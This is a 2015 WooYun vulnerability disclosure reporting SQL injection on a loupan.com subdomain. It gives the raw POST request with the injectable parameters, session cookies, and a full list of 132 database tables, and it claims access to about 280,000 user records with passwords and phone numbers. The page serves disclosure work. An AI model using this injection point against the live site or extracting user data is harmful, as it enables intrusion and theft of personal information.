当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144242

漏洞标题:楼盘网某站存在SQL注入(涉及29万用户信息)

相关厂商:loupan.com

漏洞作者: 路人甲

提交时间:2015-09-30 15:34

修复时间:2015-10-13 09:00

公开时间:2015-10-13 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-30: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /index.php/house/ajax_set_score/?s=0.44206551369279623 HTTP/1.1
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://bt.loupan.com/
Cookie: loupan_user_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fd2fb6b449ad85c36aac0ffde041b6c0%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22113.140.254.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1443537248%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22post_flag%22%3Bi%3A55871%3B%7Db81c461652f37f06c78eef9a138cae35; nom=0; loadDomain=http%3A%2F%2Fbt.loupan.com%2F; search_keyword_site_id=735; PHPSESSID=hen5d5v7iat9c8akdnmgpt1eb0; Hm_lvt_c07a5cf91cdac070faa1e701f45995a8=1443538731,1443539101,1443539345; Hm_lpvt_c07a5cf91cdac070faa1e701f45995a8=1443539345; CNZZDATA30080590=cnzz_eid%3D1915813855-1443534182-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1443534182; CNZZDATA30035949=cnzz_eid%3D1429213213-1443533965-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1443533965; HMACCOUNT=EFD7A3C5C6C0D64F; BAIDUID=864EE9BE8826851DB4873E062367ECE5:FG=1; bdshare_firstime=1443539478238
Host: bt.loupan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
house_id=2830004&score=20&type=jiaotong

11.png

132张表:

22.png

Database: loupan2013
[132 tables]
+------------------------------------+
| coreseek_counter                   |
| lp_admin                           |
| lp_admin_log                       |
| lp_admin_permissions               |
| lp_admin_roles                     |
| lp_admin_roles_permissions         |
| lp_admin_sites                     |
| lp_ads                             |
| lp_ads_pages                       |
| lp_ads_positions                   |
| lp_ads_sites                       |
| lp_attachments                     |
| lp_broker                          |
| lp_changelog                       |
| lp_ci_sessions                     |
| lp_cities                          |
| lp_cities_price                    |
| lp_consultant                      |
| lp_contact_info                    |
| lp_customer_purchase_intention     |
| lp_dissertation                    |
| lp_dissertation_model              |
| lp_email_bind                      |
| lp_email_get_password              |
| lp_email_validate                  |
| lp_fangdai_bbs                     |
| lp_feedback                        |
| lp_fenxiao_balance                 |
| lp_fenxiao_balance_application     |
| lp_fenxiao_balance_history         |
| lp_fenxiao_clients                 |
| lp_fenxiao_clients_disengagement   |
| lp_fenxiao_history                 |
| lp_fenxiao_new_broker              |
| lp_fenxiao_referrals               |
| lp_fenxiao_referrals_history       |
| lp_fenxiao_site_msg                |
| lp_fenxiao_user_collect            |
| lp_fenxiao_view                    |
| lp_fenxiao_xieyi                   |
| lp_forum                           |
| lp_friend_categories               |
| lp_friend_link_application         |
| lp_friend_link_investigation_cycle |
| lp_friend_link_investigation_error |
| lp_friend_links                    |
| lp_frontend_pages                  |
| lp_frontend_pages_extra            |
| lp_group_buy                       |
| lp_group_buy_forms                 |
| lp_hlink_in_news                   |
| lp_house_correction                |
| lp_houses                          |
| lp_houses_attributes               |
| lp_houses_click_cache              |
| lp_houses_comment                  |
| lp_houses_editor_comment           |
| lp_houses_fenxiao                  |
| lp_houses_info                     |
| lp_houses_parameters               |
| lp_houses_pic_draw                 |
| lp_houses_pic_effect               |
| lp_houses_pic_focus                |
| lp_houses_pic_mating               |
| lp_houses_pic_model                |
| lp_houses_pic_real                 |
| lp_houses_pic_traffic              |
| lp_houses_price_history            |
| lp_houses_prices                   |
| lp_houses_score                    |
| lp_houses_special                  |
| lp_houses_telephone_set            |
| lp_houses_thumb_cache              |
| lp_houses_trend                    |
| lp_hpyold2new                      |
| lp_information_gathering           |
| lp_loan                            |
| lp_lottery                         |
| lp_lottery_type                    |
| lp_loupandai_msg                   |
| lp_loupandai_token                 |
| lp_merchants                       |
| lp_message                         |
| lp_news                            |
| lp_news_backup                     |
| lp_news_categories                 |
| lp_news_info                       |
| lp_news_keywords                   |
| lp_news_position                   |
| lp_news_position_relation          |
| lp_notice                          |
| lp_notice_new                      |
| lp_notice_new_record               |
| lp_sites                           |
| lp_sms                             |
| lp_sms_queue                       |
| lp_special_keywords                |
| lp_special_keywords_comments       |
| lp_special_keywords_old            |
| lp_special_keywords_old_related    |
| lp_store                           |
| lp_syn_phone_config                |
| lp_telephone_balance               |
| lp_telephone_cost                  |
| lp_telephone_cost_bak              |
| lp_telephone_cost_bak201569        |
| lp_telephone_history               |
| lp_telephone_queue                 |
| lp_telephone_recharge_history      |
| lp_telephone_set_pool              |
| lp_toupiao                         |
| lp_user_atuo_refresh_templet       |
| lp_user_balance                    |
| lp_user_balance_history            |
| lp_user_collect                    |
| lp_user_combo                      |
| lp_user_operation_auto_refresh     |
| lp_user_operation_promotion        |
| lp_user_operation_refresh          |
| lp_user_operation_top              |
| lp_users                           |
| lp_users_accepter                  |
| lp_users_link_accepter             |
| lp_users_link_provider             |
| lp_users_provider                  |
| lp_weixin                          |
| lp_weixin_member                   |
| lp_weixin_member_pio               |
| lp_weixin_message                  |
| lp_xfbiaoqian                      |
| lp_youhui_class                    |
| lp_youhui_list                     |
+------------------------------------+

28万用户信息:

13.png

涉及用户名,密码,手机等信息:

14.png

19.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-13 09:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论